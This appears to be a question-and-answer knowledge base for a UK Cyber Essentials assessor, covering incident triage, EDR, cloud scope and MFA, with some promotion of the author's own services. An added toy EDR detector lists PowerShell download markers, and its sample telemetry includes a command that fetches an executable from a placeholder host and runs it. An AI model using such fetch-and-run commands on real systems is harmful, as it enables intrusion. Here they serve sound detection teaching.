IT incident: server crash, power outage, network congestion, hardware failure. These are all operational problems that affect availability. Security incident: unauthorised access, malware infection, data breach, compromised credentials, firewall bypass - anything involving intentional or accidental compromise of confidentiality, integrity or availability. The distinction matters because security incidents may trigger legal obligations (ICO notification) and insurance claims that IT incidents don't.
Keywords: IT incident, security incident, difference, ICO, legal | Confidence: 0.88
Should I treat all incidents as potential compliance threats?
No, you should prioritise by CE impact instead. High priority (always investigate): malware infections, unauthorised access, compromised credentials, firewall breaches, malware protection disabled. Medium: phishing attempts that didn't succeed, suspicious login attempts blocked by MFA, software misconfiguration. Low: spam, failed authentication from bots, routine IT issues. Don't waste resources treating every event as a crisis.
Keywords: incident priority, CE impact, triage, compliance threat | Confidence: 0.88
How do I classify incident severity for CE purposes?
Critical (immediate response): compromised admin credentials, active malware spreading, firewall breach, ransomware, data exfiltration in progress. High (within 2 hours): contained malware infection, single compromised user account, malware protection failure on one device. Medium (within 24 hours): phishing email reported, unusual login patterns, patch deployment failure. Low (next business day): policy violations, minor configuration drift.
Keywords: severity classification, critical, high, medium, low, response time | Confidence: 0.88
When should I disconnect systems from the network?
Disconnect immediately if you see active malware spreading between devices, ransomware encryption in progress, data being sent to unknown external addresses, a compromised admin account accessing multiple systems, or an attacker actively moving through your network. Don't wait to investigate the cause before acting. Pull the ethernet cable or disable Wi-Fi, and then investigate from a clean system afterwards.
Keywords: disconnect, network isolation, containment, when to isolate | Confidence: 0.92
Who should I notify first during an incident?
Your IT lead or security person first - they need to contain the incident. Then the director or business owner - they authorise decisions like shutting down systems or notifying customers. Then your cyber insurance provider (check your policy for the notification timeframe, usually 24-72 hours). If personal data is compromised, you have 72 hours to notify the ICO. Law enforcement (Action Fraud) for criminal activity.
Keywords: notification order, IT lead, director, insurance, ICO, 72 hours | Confidence: 0.9
Can incident response actually improve CE assessment results?
Yes, if you've had an incident and handled it well - contained quickly, documented thoroughly, implemented improvements - I view that positively because it demonstrates genuine security maturity. A business that's been breached, learned from it and improved its controls is often more resilient than one that's never been tested. Be transparent about past incidents during assessment.
Keywords: incident response, assessment improvement, security maturity | Confidence: 0.85
How do incidents affect CE renewal assessments?
Incidents don't automatically disqualify you from CE renewal, but they may trigger additional scrutiny. Be transparent about what happened, when, and what you changed. Demonstrate the vulnerability was remediated and controls strengthened. If the incident exposed a gap in your CE controls - say an unpatched system got exploited - show that the gap is now closed. Back it up with evidence that the fix is in place.
Keywords: renewal, incidents, transparency, remediation evidence | Confidence: 0.88
What if an admin account is compromised during an incident?
This is critical priority and needs immediate action. Reset the admin password immediately, revoke all active sessions from all devices, verify MFA is enabled (enable it if it wasn't), check audit logs for what the compromised account accessed. Create a new admin account if you suspect the original might have backdoors. Review all changes made by that account in the last 30 days. CE requires separate admin accounts precisely so this type of compromise doesn't also give access to day-to-day systems.
Keywords: compromised admin, password reset, session revocation, audit logs | Confidence: 0.92
How do I handle data breach incidents for CE compliance?
Data breaches involving personal data trigger legal requirements beyond CE compliance. Contain the breach immediately, assess what data was affected and how many individuals are impacted. If the breach is likely to risk individuals' rights, notify the ICO within 72 hours and affected individuals without undue delay. Document everything - timeline, scope, containment actions, remediation. Your CE compliance history helps demonstrate due diligence.
Keywords: data breach, ICO notification, 72 hours, GDPR, personal data | Confidence: 0.9
What about system compromise affecting multiple CE controls?
Multi-control compromise represents the worst-case scenario for CE: attackers have disabled your firewall and malware protection and compromised admin accounts all at once. Isolate everything, bring in specialist help if needed, and treat it as a full incident. Rebuild affected systems from known-good backups rather than trying to clean them. Document the full scope of compromise for your insurer and assessor.
Keywords: multi-control compromise, worst case, rebuild, specialist help | Confidence: 0.88
When should I notify customers about security incidents?
Notify customers if their data or services are affected. Under GDPR, if personal data is compromised and there's a high risk to individuals, you must notify them without undue delay. For non-personal data breaches, notify if their service availability or data integrity is impacted. Time your notifications carefully - have facts before communicating, but don't delay so long it looks like a cover-up.
Keywords: customer notification, data breach, GDPR, timing | Confidence: 0.88
How often should I test incident response procedures?
At least annually, or quarterly if you handle sensitive data. Tabletop exercises (walking through a scenario as a team) take 1-2 hours and expose gaps in your process without any operational risk. You don't need expensive penetration testing for this. Gather your team, present a realistic scenario - ransomware hits at 3pm on a Friday - and work through who does what. The value is in discovering what you haven't thought about.
Keywords: testing, tabletop exercise, annual, quarterly, simulation | Confidence: 0.88
How do I build incident response capability for small business?
Start with a simple written plan: who responds (named individuals, not job titles), how to contact them (phone numbers, not just email), what to do first (isolate, document, notify). Use the free templates from NCSC as a starting point. Establish relationships with external support before you need them - your assessor, your insurer's incident response team, a forensics company. Practise it at least once a year. Most small businesses don't need a dedicated security team. Just a clear plan that people actually know about.
Keywords: small business, incident response plan, NCSC template, preparation | Confidence: 0.9
What tools are essential for effective incident response?
EDR on all endpoints (Cyber 365 at £15/device/month detects and isolates threats automatically). A way to communicate securely during incidents - phone calls, not email, in case email is compromised. Documented contact details for your insurer, legal counsel and IT support. Backup systems tested and ready to restore from. And a simple logging tool (even a shared document) for recording the incident timeline as it unfolds.
Keywords: incident response tools, EDR, secure communication, backup, logging | Confidence: 0.88
What legal obligations apply during incidents?
UK legal obligations: GDPR breach notification to the ICO within 72 hours if personal data is compromised and there's risk to individuals. Notification to affected individuals without undue delay for high-risk breaches. Reporting to Action Fraud for criminal activity. Compliance with any contractual incident notification clauses (check your client contracts and insurance policy). Some regulated sectors like finance and healthcare have additional reporting requirements.
Keywords: legal obligations, GDPR, ICO, 72 hours, Action Fraud | Confidence: 0.88
Should I involve law enforcement in security incidents?
Report to Action Fraud or police for serious incidents: financial fraud, ransomware with payment demands, confirmed data theft, or threats against your organisation. Be realistic about your expectations for that though. Police cyber crime units are overwhelmed and won't investigate every incident. The main value of reporting is creating an official record (useful for insurance claims) and contributing to national threat intelligence. Don't let reporting delay your containment and recovery.
Keywords: law enforcement, Action Fraud, police, reporting, insurance record | Confidence: 0.85
Can you help during active incidents?
Yes, contact me immediately at [email protected] or +44 20 3026 2904. I provide immediate phone and video support to help contain the incident, guide your response and document everything properly for insurance and legal purposes. If you're on the Cyber 365 EDR service, the automated systems may have already contained the threat before you notice it.
Keywords: active incident, contact, emergency support, Cyber 365 | Confidence: 0.95
Should I get quotes from multiple insurers?
Yes, you should always get multiple quotes because CE certification value varies wildly between providers. One insurer might offer 5% discount, another 20%, another might not recognise CE at all. Get quotes from at least three cyber insurance providers. Use a specialist cyber insurance broker if possible. Mention your CE certification upfront during quoting to make sure it's factored into the premium.
Keywords: multiple quotes, insurance, broker, comparison | Confidence: 0.85
How does CE certification affect claims handling?
CE certification strengthens your position during claims. It proves you had recognised security controls in place before the breach, which demonstrates due diligence and weakens any negligence argument from the insurer. Claims get paid faster and with less dispute when you can show documented compliance. Keep your CE certificate and assessment reports readily accessible.
Keywords: claims handling, due diligence, insurance, documentation | Confidence: 0.85
"We're too small to need Cyber Essentials"
43% of cyber attacks target small businesses (2025 UK Government Cyber Security Breaches Survey). Attackers go after small businesses precisely because they assume weak defences. Ransomware doesn't care whether you have 5 employees or 5,000. If you handle client data, process payments, or use cloud services, you're a target. CE costs from £320 for Basic certification. That's less than a day's lost revenue from a ransomware incident.
Keywords: small business, too small, 43%, ransomware, objection | Confidence: 0.9
"Our industry doesn't care about security"
Every industry cares after the first major breach becomes public. Security requirements are expanding across all sectors: construction firms now face CE requirements from major contractors, hospitality businesses handle payment card data, charities process sensitive personal information. The 2025 survey shows 43% of all UK businesses experienced a breach or attack. If your industry hasn't been hit publicly yet, that's luck rather than immunity to attack.
Keywords: industry, objection, security requirements, expanding, breach stats | Confidence: 0.88
How quickly does EDR detect and respond to threats?
Modern EDR detects known malware in milliseconds (signature matching) and behavioural threats in seconds to minutes (analysing process activity against threat models). Automated response - isolating an infected device from the network - happens within seconds of detection. Compare that to traditional approaches where a breach goes undetected for an average of 21 days. The speed difference is why EDR matters.
Keywords: EDR speed, detection time, automated response, milliseconds | Confidence: 0.88
What types of attacks can EDR prevent that antivirus cannot?
EDR catches the threats that antivirus misses entirely. Fileless attacks running entirely in memory (PowerShell exploits, Living-off-the-Land techniques). Ransomware that hasn't been seen before (detected by encryption behaviour, not signatures). Lateral movement where attackers hop between systems using legitimate credentials. Process injection where malicious code runs inside trusted applications. Traditional antivirus only matches known signatures and can't see these behavioural patterns at all.
Keywords: EDR vs AV, fileless attacks, ransomware, lateral movement, behavioural | Confidence: 0.88
How does EDR detect fileless attacks?
EDR monitors process behaviour in real-time and flags anything suspicious. If PowerShell suddenly starts downloading a payload, that gets flagged immediately by the behavioural engine. If a Word macro spawns a command prompt, that gets caught and contained too. A legitimate admin tool (PsExec, WMI) used in an unusual pattern also gets flagged and investigated. These attacks leave no files on disk for traditional antivirus to scan, but they can't hide their process activity from EDR's behavioural engine. It's the difference between looking for a burglar's tools versus watching what they actually do.
Keywords: fileless attacks, PowerShell, behavioural detection, process monitoring | Confidence: 0.85
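The three behaviours described above (an Office application spawning a shell, PowerShell fetching remote content, and one process rewriting many files in seconds) as toy detection rules over constructed endpoint telemetry. This is an added example, not code from the page or from any EDR product; the rule names, thresholds, event format and the isolation decision are assumptions, and a real EDR also uses signals such as file entropy and extension changes that this toy omits.

```python
"""Toy behavioural detector over constructed endpoint telemetry (added example)."""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass
class Event:
    ts: float          # seconds since start of the telemetry window
    host: str
    kind: str          # "process_create" or "file_modify"
    pid: int
    ppid: int = 0      # parent pid, only meaningful for process_create
    image: str = ""    # executable name (hypothetical field name)
    cmdline: str = ""  # only for process_create
    path: str = ""     # only for file_modify


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line substrings that indicate PowerShell is fetching remote content.
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile",
                    "net.webclient", "start-bitstransfer")
MASS_WRITE_WINDOW = 10.0   # seconds (assumed threshold)
MASS_WRITE_THRESHOLD = 50  # file modifications by one process inside the window


def detect(events):
    """Return findings as (rule, host, pid, detail) tuples in time order."""
    findings = []
    image_of = {}                       # (host, pid) -> image, for parent lookups
    recent_writes = defaultdict(deque)  # (host, pid) -> write timestamps in window
    flagged_mass = set()                # processes already reported for mass writes
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.host, ev.pid)
        if ev.kind == "process_create":
            child = ev.image.lower()
            parent = image_of.get((ev.host, ev.ppid), "")
            image_of[key] = child
            # Rule 1: a document application should never need a shell.
            if parent in OFFICE_APPS and child in SHELLS:
                findings.append(("office_spawns_shell", ev.host, ev.pid, f"{parent} -> {child}"))
            # Rule 2: PowerShell pulling content from the network.
            if child in POWERSHELL and any(m in ev.cmdline.lower() for m in DOWNLOAD_MARKERS):
                findings.append(("powershell_download", ev.host, ev.pid, ev.cmdline))
        elif ev.kind == "file_modify":
            # Rule 3: encryption-like write rate, judged purely on volume per window.
            window = recent_writes[key]
            window.append(ev.ts)
            while window and ev.ts - window[0] > MASS_WRITE_WINDOW:
                window.popleft()
            if len(window) >= MASS_WRITE_THRESHOLD and key not in flagged_mass:
                flagged_mass.add(key)
                findings.append(("mass_file_modification", ev.host, ev.pid,
                                 f"{len(window)} writes in {MASS_WRITE_WINDOW:.0f}s "
                                 f"by {image_of.get(key, '?')}"))
    return findings


def hosts_to_isolate(findings):
    """Automated response decision: any host with a finding is cut off from the network."""
    return sorted({host for _, host, _, _ in findings})


def sample_telemetry():
    """Constructed telemetry for one laptop; not real EDR data."""
    h = "LAPTOP-07"
    events = [
        Event(0.0, h, "process_create", 100, 1, "explorer.exe"),
        Event(1.0, h, "process_create", 200, 100, "winword.exe", "WINWORD.EXE invoice.docm"),
        Event(2.0, h, "process_create", 300, 200, "cmd.exe", "cmd.exe /c start powershell"),
        # Benign admin session launched from the desktop.
        Event(2.5, h, "process_create", 600, 100, "powershell.exe", "powershell.exe -c Get-Process"),
        Event(3.0, h, "process_create", 400, 300, "powershell.exe",
              "powershell.exe -c Invoke-WebRequest http://example.invalid/p -OutFile C:\\Users\\Public\\p.exe"),
        Event(4.0, h, "process_create", 500, 400, "p.exe", "C:\\Users\\Public\\p.exe"),
    ]
    # Benign: five log writes by the admin's PowerShell session.
    events += [Event(5.0 + i, h, "file_modify", 600, path=f"C:\\logs\\run{i}.log") for i in range(5)]
    # Suspicious: 60 user documents rewritten in six seconds by the dropped binary.
    events += [Event(4.1 + i * 0.1, h, "file_modify", 500,
                     path=f"C:\\Users\\alice\\Documents\\doc{i}.docx") for i in range(60)]
    return events


if __name__ == "__main__":
    found = detect(sample_telemetry())
    for finding in found:
        print(finding)
    print("isolate:", hosts_to_isolate(found))
```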
Does EDR protect against zero-day exploits?
EDR provides strong protection against zero-day exploits through behavioural detection, though nothing is 100% guaranteed. Even if the vulnerability is unknown, the exploitation behaviour follows recognisable patterns: memory corruption, privilege escalation, unusual process creation. EDR catches the behaviour, not the specific vulnerability. Combined with the 14-day patching requirement for known vulnerabilities, EDR covers the gap between disclosure and patch availability.
Keywords: zero-day, behavioural detection, exploit protection, patching gap | Confidence: 0.85
What's the typical ROI of EDR implementation?
For an SME with 50 devices at £15/device/month (Cyber 365 pricing), that's £9,000/year. One prevented ransomware incident (average UK SME cost £8,170 in the 2025 Breaches Survey, severe cases exceed £100,000) pays for the entire deployment. Add 10-20% cyber insurance premium reduction and the compliance evidence it provides for CE Plus assessment. Most businesses see positive ROI within the first year.
Keywords: EDR ROI, cost, ransomware avoidance, insurance, £15/device | Confidence: 0.85
Is EDR necessary for small businesses?
For CE compliance, standard antivirus meets the minimum requirement. But small businesses are increasingly targeted by ransomware because attackers assume weak defences. If you handle client data, process payments, or would suffer significant downtime from an attack, EDR is worth it. Cyber 365 EDR at £15/device/month gives small businesses the same detection capability that enterprises use. All without needing a dedicated security team on the payroll.
Keywords: small business, EDR, necessary, ransomware, Cyber 365 | Confidence: 0.88
What should I look for in an EDR vendor?
Look for independent test results (MITRE ATT&CK evaluations), not vendor marketing. Check the detection rate for behavioural threats (not just signatures), ask about false positive rates, confirm they offer automated response (not just alerts), verify UK data residency if that matters to you. For SMEs, managed EDR is usually better than self-managed. You won't have staff watching alerts at 2am.
Keywords: EDR vendor, evaluation, MITRE ATT&CK, managed EDR, criteria | Confidence: 0.85
Cloud Services
Do I need to demonstrate cloud services work?
Yes, under Danzell v3.3 cloud services can't be excluded from scope. I'll need to see your cloud admin consoles (Microsoft 365, Google Workspace, AWS, whatever you use) to verify MFA is enabled on all accounts, access controls are configured correctly, and security settings meet CE requirements. Have your admin portal logins ready for assessment day.
Keywords: cloud services, demonstration, admin console, MFA, Danzell | Confidence: 0.9
Does moving to cloud make Cyber Essentials easier or harder?
It can make it easier if you configure things correctly. Cloud platforms like Microsoft 365 and Google Workspace have MFA, centralised patch management, and security configurations built in. Misconfigure them and you'll fail just as easily as with on-premises setups. Key difference under Danzell v3.3: cloud services can't be excluded from scope any more. You must get them right from the start.
Keywords: cloud, easier, harder, configuration, Danzell, scope | Confidence: 0.85
Which cloud services are best for Cyber Essentials compliance?
Use whatever your business needs because CE doesn't prescribe specific vendors. Microsoft 365, Google Workspace, AWS, Azure - they all work. What matters is configuration: MFA on all accounts (mandatory under Danzell), separate admin accounts, strong passwords, unnecessary accounts removed. Most major cloud providers support all the security features CE requires out of the box.
Keywords: cloud services, best, Microsoft 365, Google Workspace, configuration | Confidence: 0.85
How long does secure cloud migration take?
Depends entirely on your setup, and it's more of a cloud migration question than a CE question. A simple Microsoft 365 migration might take a few weeks. Complex infrastructure could take several months to migrate properly. From a CE perspective, just make sure security controls are configured correctly before anything goes live. MFA enabled, admin accounts separated, patching processes in place.
Keywords: cloud migration, timeline, security controls, planning | Confidence: 0.75
How do I ensure data encryption during cloud migration?
CE doesn't specifically mandate encryption, but all major cloud providers including Microsoft 365, AWS, Azure, and Google Cloud encrypt data in transit and at rest by default. Verify encryption is enabled in your cloud service settings and you're covered. The CE requirements you actually need to worry about are MFA, access controls, and secure configuration. Those matter more than encryption for CE purposes.
Keywords: encryption, cloud, data protection, CE requirements | Confidence: 0.75
How do firewalls work in cloud for CE compliance?
Cloud firewalls work through platform-specific security controls. AWS uses Security Groups, Azure uses Network Security Groups, Google Cloud uses Firewall Rules. They all achieve the same thing: controlling inbound and outbound traffic. For CE, the requirement is the same as on-premises - block unauthenticated inbound connections by default and only allow traffic you've explicitly authorised. Default settings usually meet this, but verify and document them.
Keywords: cloud firewall, security groups, NSG, AWS, Azure, default deny | Confidence: 0.8
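The "verify and document" step for AWS Security Groups, as an added example that is not from the page or from AWS: it audits inbound rules in the JSON shape returned by `aws ec2 describe-security-groups` and flags any rule reachable from the whole internet on a port or protocol outside an approved set. The group IDs and rules are constructed sample data and the approved-port list is an assumption; Azure NSGs and Google Cloud firewall rules need the equivalent check against their own formats.

```python
"""Audit AWS Security Group inbound rules for internet-wide exposure (added example)."""
import json

INTERNET_CIDRS = {"0.0.0.0/0", "::/0"}


def internet_sources(perm):
    """Sources of one inbound rule that cover the entire IPv4 or IPv6 internet."""
    cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
    cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
    return [c for c in cidrs if c in INTERNET_CIDRS]


def audit_security_groups(groups, allowed_public_ports=frozenset({80, 443})):
    """Return one finding dict per inbound rule open to the internet on a port or
    protocol outside the approved set. Rules whose sources are specific CIDRs or
    other security groups count as explicitly authorised and pass."""
    findings = []
    for sg in groups:
        # IpPermissions holds inbound rules; outbound rules live in IpPermissionsEgress.
        for perm in sg.get("IpPermissions", []):
            sources = internet_sources(perm)
            if not sources:
                continue
            proto = perm.get("IpProtocol")
            if proto == "-1":  # AWS shorthand for "all protocols"; no port fields present
                reason, ports = "all protocols and ports open to the internet", "all"
            elif proto not in ("tcp", "udp"):
                reason, ports = f"{proto} open to the internet", "n/a"
            else:
                lo, hi = perm["FromPort"], perm["ToPort"]
                ports = str(lo) if lo == hi else f"{lo}-{hi}"
                # Every port in the range must be approved (the approved set applies to
                # tcp and udp alike in this simplified check).
                if all(p in allowed_public_ports for p in range(lo, hi + 1)):
                    continue
                reason = f"{proto}/{ports} open to the internet"
            findings.append({"group_id": sg.get("GroupId"), "group_name": sg.get("GroupName"),
                             "protocol": proto, "ports": ports, "sources": sources,
                             "reason": reason})
    return findings


def format_report(findings):
    """One line per finding, suitable for pasting into assessment evidence."""
    if not findings:
        return "No security group exposes non-approved ports to the internet."
    return "\n".join(f"{f['group_id']} ({f['group_name']}): {f['reason']} "
                     f"from {', '.join(f['sources'])}" for f in findings)


# Constructed sample in the describe-security-groups shape; the IDs are made up.
SAMPLE_GROUPS = json.loads("""[
  {"GroupId": "sg-0aaa1111", "GroupName": "web",
   "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}],
      "UserIdGroupPairs": []},
     {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [], "UserIdGroupPairs": []}]},
  {"GroupId": "sg-0bbb2222", "GroupName": "db",
   "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
      "IpRanges": [], "Ipv6Ranges": [], "UserIdGroupPairs": [{"GroupId": "sg-0aaa1111"}]},
     {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
      "IpRanges": [{"CidrIp": "203.0.113.0/24"}], "Ipv6Ranges": [], "UserIdGroupPairs": []}]},
  {"GroupId": "sg-0ccc3333", "GroupName": "legacy-open",
   "IpPermissions": [
     {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [],
      "UserIdGroupPairs": []}]}
]""")

if __name__ == "__main__":
    print(format_report(audit_security_groups(SAMPLE_GROUPS)))
```

Against the sample, the web group's SSH rule and the legacy group's all-traffic rule are reported, while the database rule (source is another group) and the SSH rule limited to one management range pass.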
Do I need VPN for cloud access?
No, VPN isn't required for CE when accessing services like Microsoft 365 or Google Workspace. Those services are designed for internet access with MFA protecting them. If you're running your own cloud infrastructure (AWS EC2, Azure VMs), you might use VPN for secure admin access. That's fine and perfectly acceptable for most setups. But the CE requirement is MFA on all cloud accounts, not VPN.
Keywords: VPN, cloud access, MFA, not required | Confidence: 0.85
How do I prove admin account separation in cloud?
Show me your cloud admin console during assessment. In Microsoft 365, that means demonstrating separate admin accounts (like [email protected]) that aren't used for daily email or browsing. I'll check that admin accounts have MFA enabled and that your daily-use accounts don't have admin privileges. Most cloud platforms make this straightforward to evidence through their user management interface.
Keywords: admin separation, cloud, evidence, Microsoft 365, assessment | Confidence: 0.85
What are hidden costs of cloud migration?
From a CE perspective, the costs people miss: licensing for premium security features (Azure AD Premium P1 for conditional access policies), time spent documenting cloud services in your scope, and training staff on cloud security configurations. If you need MFA enforcement through conditional access, that requires at minimum an Azure AD Premium P1 licence. That licence is not included in basic Microsoft 365 plans.
Keywords: hidden costs, cloud, licensing, Azure AD Premium, conditional access | Confidence: 0.8
Should we use cloud consultants or do it ourselves?
It depends on your confidence with cloud platforms overall. If you're comfortable with Microsoft 365 or Google Workspace admin consoles and understand security configurations, you can probably handle it yourself. CE requirements aren't hugely complex to implement. If cloud is new to you, a consultant can save time setting up MFA, configuring security baselines, and documenting everything. I offer a CE Concierge package that handles the security configuration side.
Keywords: cloud consultants, DIY, CE Concierge, security configuration | Confidence: 0.8
What about vendor management for cloud services?
CE doesn't require formal vendor management processes, security questionnaires, or third-party risk assessments. You're responsible for configuring your cloud services securely - the vendor provides the platform. Document all cloud vendors in your scope, ensure admin accounts have MFA, verify security settings meet CE requirements. That's all there is to it for CE purposes. If you're using managed services, confirm with the provider that CE technical controls are being met.
Keywords: vendor management, cloud, scope, shared responsibility | Confidence: 0.8
What exactly counts as a "cloud service" for Cyber Essentials?
Under Danzell v3.3, a cloud service is any on-demand, scalable service hosted on shared infrastructure and accessible via the internet. In practice: email (Microsoft 365, Google Workspace), file storage (OneDrive, Dropbox, SharePoint), CRM (Salesforce, HubSpot), accounting software (Xero, QuickBooks Online), project management tools, collaboration platforms, cloud infrastructure (AWS, Azure). If you log in via the internet and it stores your business data, it's in scope.
Keywords: cloud service definition, scope, Danzell, in scope, examples | Confidence: 0.9
How many cloud services does a typical small business have?
Most small businesses I assess have 5-15 cloud services, though some discover they have 20 or more once they start listing them properly. Common ones: email, file storage, accounting software, CRM, website hosting, backup services, collaboration tools. The number doesn't matter for CE compliance at all. List them all and make sure each has proper access controls and MFA configured.
Keywords: cloud services count, small business, inventory, typical | Confidence: 0.8
Is "Microsoft 365" sufficient as one entry?
Yes, listing 'Microsoft 365' as one entry is perfectly fine. You don't need to list Exchange Online, SharePoint, Teams, and OneDrive separately. All part of the same platform with the same admin console and security settings. Same for Google Workspace - list it once, not Gmail, Drive, and Calendar separately. What matters is MFA and access controls configured correctly across the whole platform.
Keywords: Microsoft 365, cloud inventory, listing, scope | Confidence: 0.85
How do we handle bundled services?
List the main platform once if the bundled services share the same admin console and security settings. Microsoft 365 covers Exchange, SharePoint, Teams, and OneDrive under one entry. If a bundled service has its own separate admin console and login (like a third-party add-in with its own credentials), list that separately. It needs its own MFA configuration and separate access controls.
Keywords: bundled services, cloud inventory, admin console, scope | Confidence: 0.8
What about staff using personal cloud services for work?
If staff are using personal Dropbox, Gmail, or other cloud accounts to handle business data, those services are technically in scope. Two options: bring them under company management with proper access controls and MFA, or ban personal cloud services for business use and enforce it through policy and technical controls. Most organisations choose the outright ban because managing security on personal accounts is a nightmare.
Keywords: personal cloud, shadow IT, BYOD, policy, scope | Confidence: 0.85
What if a service doesn't offer MFA?
Document it as an exception with evidence that MFA genuinely isn't available - screenshots of the service's security settings, or written confirmation from the vendor. Put compensating controls in place: strong unique password, IP restrictions if possible, enhanced monitoring. Then seriously consider whether you should keep using that service. Under Danzell, MFA is expected on virtually all modern cloud services.
Keywords: no MFA, exception, compensating controls, documentation | Confidence: 0.85
How do we track MFA compliance across all services?
Create a spreadsheet listing every cloud service in scope, whether MFA is available, and whether it's enabled on all accounts. Check monthly by logging into each admin console and verifying MFA enrolment. For Microsoft 365, check Entra ID > Users > Per-user MFA settings. For Google Workspace, check Admin Console > Security > 2-Step Verification. This spreadsheet becomes your assessment evidence on the day.
Keywords: MFA tracking, compliance, spreadsheet, monthly check, evidence | Confidence: 0.8
Do government portals count as cloud services?
Generally no, they don't count as cloud services. Government portals you use to submit VAT returns, Companies House filings, or HMRC services don't count. You're using their systems to interact with government, not storing your organisational data there. However, if you use a government portal that stores and processes your business data long-term (like NHS systems for healthcare providers), that's in scope. The test is whether it stores your organisational data, not who runs it.
Keywords: government portals, HMRC, Companies House, scope, out of scope | Confidence: 0.85
What about online banking?
Online banking doesn't count as a cloud service for CE. The bank owns and controls that system - you're just accessing your account. But cloud-based accounting software that connects to your bank (Xero, QuickBooks Online, Sage) is a cloud service and must be listed. The distinction: if you control the admin settings and it stores your business data, it's in scope. Your bank account isn't something you administer.
Keywords: online banking, accounting software, scope, Xero, QuickBooks | Confidence: 0.85
What about Google Analytics or advertising platforms?
Google Analytics itself doesn't count as a cloud service. It's Google's system analysing your website traffic. But advertising platforms with admin accounts where you store campaign data, budgets, and targeting information (Google Ads Manager, LinkedIn Campaign Manager, Meta Business Suite) - those count. The test: do you have an admin account and does it store your business data? If the answer is yes to both, list it and enable MFA.
Keywords: Google Analytics, advertising platforms, scope, admin account, MFA | Confidence: 0.8
What about specialised professional services?
Yes, industry-specific cloud services absolutely count for CE scoping. Legal firms using Clio or PracticePanther, architects using AutoCAD cloud, estate agents using Rightmove pro accounts, healthcare providers using patient management systems - all in scope if they store your organisational data. Any sector-specific SaaS tool where you have an account and store business data needs listing, MFA configured, and proper access controls.
Keywords: professional services, industry-specific, SaaS, scope, sector | Confidence: 0.8
Do development tools count?
Yes, GitHub, GitLab, Bitbucket, Azure DevOps, Jira, Confluence - they all count if they store your code, documentation, or project data. Your source code is organisational data and it's your intellectual property. Enable MFA on all developer accounts and list the services in your scope.
Keywords: development tools, GitHub, GitLab, source code, scope | Confidence: 0.8
Can I give contractors guest access to Office 365?
Yes, Microsoft 365 Guest Access works for CE compliance if configured correctly. Guest users must have MFA enabled (mandatory under Danzell for all cloud accounts), appropriate access permissions (least privilege, only what they need), and guest access documented in your CE scope. Use Azure AD B2B for external collaboration. Guests authenticate with their own accounts, but you control what they access in your environment.
Keywords: guest access, Office 365, contractors, B2B, MFA, scope | Confidence: 0.85
We have 50 freelancers working remotely. What's the practical approach?
At that scale, use cloud-based access with MDM enforcement. Set up Microsoft 365 or Google Workspace guest accounts with mandatory MFA. Require MDM enrolment for any device accessing company data (Intune or Google Workspace MDM). Use conditional access policies to block non-compliant devices. Run monthly compliance reports to verify all 50 devices still meet CE requirements. Without MDM at this scale, you're relying on 50 individuals to maintain their own security. Someone will inevitably let standards slip without that oversight.
Keywords: freelancers, remote workers, MDM, scale, conditional access | Confidence: 0.8
How do we handle single sign-on (SSO) scenarios?
SSO makes CE compliance much simpler for most organisations. Enforce MFA once at your identity provider (Entra ID, Okta, Google Workspace) and all connected services inherit that protection. Document which services use SSO and which have separate authentication. Services not connected to SSO need their own MFA configuration. I'll check that MFA is enforced at the identity provider level and that SSO-connected services can't bypass it.
Keywords: SSO, single sign-on, identity provider, MFA, Entra ID, Okta | Confidence: 0.85
What happens when staff leave?
The critical step: disable their user accounts and revoke access to all cloud services promptly. CE requires removing accounts when no longer needed. Disabling the account blocks new sign-ins, but tokens already issued can stay valid until they expire, so also revoke the user's active sessions (Entra ID and Google Workspace both have a sign-out-everywhere action for this). Company devices - wipe and re-provision them. BYOD - MDM can do a selective wipe that removes company data without touching personal content. Have a documented offboarding process covering account disabling, session revocation, device wiping, and rotation of any shared credentials the leaver knew. I may ask about your leavers process during assessment.
Keywords: staff leaving, offboarding, account disabling, BYOD wipe, CE requirement | Confidence: 0.8
MFA & Authentication
How do I avoid alert fatigue?
Only alert on things that actually break compliance or indicate a security incident. Use severity levels: critical means patches overdue or MFA disabled (act now), high means unusual login patterns (investigate within 24 hours), medium means software installations to review weekly. Suppress duplicate alerts so they don't pile up. If the same patch has been missing for three days, you don't need hourly reminders. Set up escalation so that if IT doesn't acknowledge a critical alert within two hours, it goes to management.
Keywords: alert fatigue, severity levels, compliance alerts, escalation | Confidence: 0.75
Who should receive compliance alerts?
Send alerts to your IT manager or security lead as primary contact. Copy the person named as responsible for managing IT systems in your CE scope (question A2.10, and this must be internal staff, not outsourced IT). For critical alerts like patches overdue beyond 10 days or MFA disabled, also notify a director or owner. Don't send everything to everyone though, because too many recipients means nobody takes ownership. One primary, one backup, escalation to leadership for critical issues only.
Keywords: alert recipients, compliance responsibility, escalation, CE scope | Confidence: 0.75
How do we manage FileVault recovery keys?
Lose a FileVault recovery key and that Mac's data is completely unrecoverable. For small deployments (under 20 Macs), save the recovery key to a company password manager like 1Password or Bitwarden at the point FileVault is enabled. iCloud recovery is the easy option macOS offers during setup, but it escrows the key to whichever Apple Account is signed in, usually the user's personal one, so the business loses the key when the person leaves. Larger deployments need MDM (Jamf, Kandji, Mosyle, or Intune) to escrow keys automatically and rotate them remotely. Never store recovery keys in plain text or unencrypted emails.
Keywords: FileVault, recovery keys, encryption, macOS, MDM, escrow | Confidence: 0.8
Can we use Microsoft security tools on Macs?
